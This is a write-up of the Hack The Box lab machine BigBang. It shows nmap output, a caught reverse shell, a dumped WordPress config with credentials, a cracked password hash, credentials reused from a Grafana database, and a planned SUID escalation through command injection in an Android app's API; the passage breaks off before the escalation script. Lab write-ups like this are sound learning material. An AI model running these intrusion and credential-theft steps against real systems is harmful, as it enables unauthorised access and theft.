BigBang is a hard-difficulty machine from Hack The Box dealing initially with a buddyforms 2.7.7 WordPress plugin that is vulnerable to a chain of CVE-2024-2961 that is a Buffer Overflow in linux’s GLIBC library function iconv and CVE-2023–26326 that is a buddyForms unauthenticated insecure deserialization issue. This will grant us shell access to the system we’re we’ll be exfiltrating credentials first from WordPress config files and later from a grafana database file. We’ll finally abuse an API endpoint that’s vulnerable to command injection after thoroughly analysing an Android Application.
BigBang-info-card
Reconnaissance
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
PS C:\Users\0xkujen> nmap -A-Pn10.10.11.52 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-2910:34 W. Central Africa Standard Time Nmap scan report for10.129.50.39 Host is up (0.17s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA) |_ 2566c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519) 80/tcp open http Apache httpd 2.4.62 |_http-server-header: Apache/2.4.62 (Debian) |_http-title: Did not follow redirect to http://blog.bigbang.htb/ Service Info: Host: blog.bigbang.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in39.40 seconds
We can see that we only have our typical ssh 22 port and an http 80 port redirecting us towards http://blog.bigbang.htb/ so we’ll add an entry for that in our /etc/hosts file.
PS C:\Users\0xkujen> nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.16.29] from (UNKNOWN) [10.10.11.52] 50590 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell www-data@8e3a72b5e980:/var/www/html/wordpress/wp-admin$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@8e3a72b5e980:/var/www/html/wordpress/wp-admin$
Lateral Movement - Database Credentials exfiltration
Looking for database we files, we find our usual wp-config.php:
www-data@8e3a72b5e980:/var/www/html/wordpress$ cat wp-config.php cat wp-config.php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' ); /** Database username */ define( 'DB_USER', 'wp_user' ); /** Database password */ define( 'DB_PASSWORD', 'wp_password' ); /** Database hostname */ define( 'DB_HOST', '172.17.0.1' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this ifin doubt. */ define( 'DB_COLLATE', '' );
/**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to login again. * * @since 2.6.0 */ define( 'AUTH_KEY', '(6xl?]9=.f9(<(yxpm9]5<wKsyEc+y&MV6CjjI(0lR2)_6SWDnzO:[g98nOOPaeK' ); define( 'SECURE_AUTH_KEY', 'F<3>KtCm^zs]Mxm Rr*N:&{SWQexFn@ wnQ+bTN5UCF-<gMsT[mH$m))T>BqL}%8' ); define( 'LOGGED_IN_KEY', ':{yhPsf}tZRfMAut2$Fcne/.@Vs>uukS&JB04 Yy3{`$`6p/Q=d^9=ZpkfP,o%l]' ); define( 'NONCE_KEY', 'sC(jyKu>gY(,&: KS#Jh7x?/CB.hy8!_QcJhPGf@3q<-a,D#?!b}h8 ao;g[<OW;' ); define( 'AUTH_SALT', '_B& tL]9I?ddS! 0^_,4M)B>aHOl{}e2P(l3=!./]~v#U>dtF7zR=~LnJtLgh&KK' ); define( 'SECURE_AUTH_SALT', '<Cqw6ztRM/y?eGvMzY(~d?:#]v)em`.H!SWbk.7Fj%b@Te<r^^Vh3KQ~B2c|~VvZ' ); define( 'LOGGED_IN_SALT', '_zl+LT[GqIV{*Hpv>]H:<U5oO[w:]?%Dh(s&Tb-2k`1!WFqKu;elq7t^~v7zS{n[' ); define( 'NONCE_SALT', 't2~PvIO1qeCEa^+J}@h&x<%u~Ml{=0Orqe]l+DD7S}%KP}yi(6v$mHm4cjsK,vCZ' );
/**#@-*/
/** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_';
/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Which contains the credentials for wp_user (wp_user:wp_password) user which we can use the credentials for to port forward the mysql service (port 3306) and access it through our attacker machine. First let’s use chisel to forward the port 3306 to our attacker machine: On our attacker machine:
We can now use Mysql Workbench to connect using those credentials: MySQL Connection
We can now execute the following commands to get the shawking user hash: MySQL Connection
Later we attempt to crack the hash using JohnTheRipper:
1 2 3 4 5 6 7 8 9 10 11
┌──(kali㉿kali)-[~] └─$ john --format=phpass -w=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status quantumphysics (?) 1g 0:00:02:33 DONE (2025-01-31 20:05) 0.006532g/s 29099p/s 29099c/s 29099C/s quarashi33..quanteka Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed.
We can now use that to ssh into the box and claim our user flag:
1 2 3 4 5
shawking@bigbang:~$ id uid=1001(shawking) gid=1001(shawking) groups=1001(shawking) shawking@bigbang:~$ cat user.txt 843380241da5d7490f87e3c709fbbbb2 shawking@bigbang:~$
Lateral Movement to developer - Grafana Database Exfiltration
Now looking at /opt directory we find an interesting data folder containing a grafana.db database file:
1 2 3 4
-bash-5.1$ id uid=1001(shawking) gid=1001(shawking) groups=1001(shawking) -bash-5.1$ ls csv grafana.db pdf plugins png
We can transfer that out to our attacker machine via scp and check it out:
Started: Fri Jan 31 20:27:43 2025 Stopped: Fri Jan 31 20:28:09 2025
developer:bigbang
1 2 3 4 5
-bash-5.1$ su developer Password: bash-5.1$ id uid=1002(developer) gid=1002(developer) groups=1002(developer) bash-5.1$
Privilege Escalation to root - command injection in Android App
Checking developer’s home directory, we can find an android folder with a satellite-app.apk:
1 2 3 4
bash-5.1$ pwd /home/developer/android bash-5.1$ ls satellite-app.apk
We can transfer that to our machine and open it with jadx: Android Application
We can see from the code that we have two endpoints: /login and /command, /command is vulnerable to command injection through malicious input inside the output_file parameter: Android Application Android Application
Therefore we can craft a script that maliciously modifies our /bin/bash binary by adding the SUID bit to it:
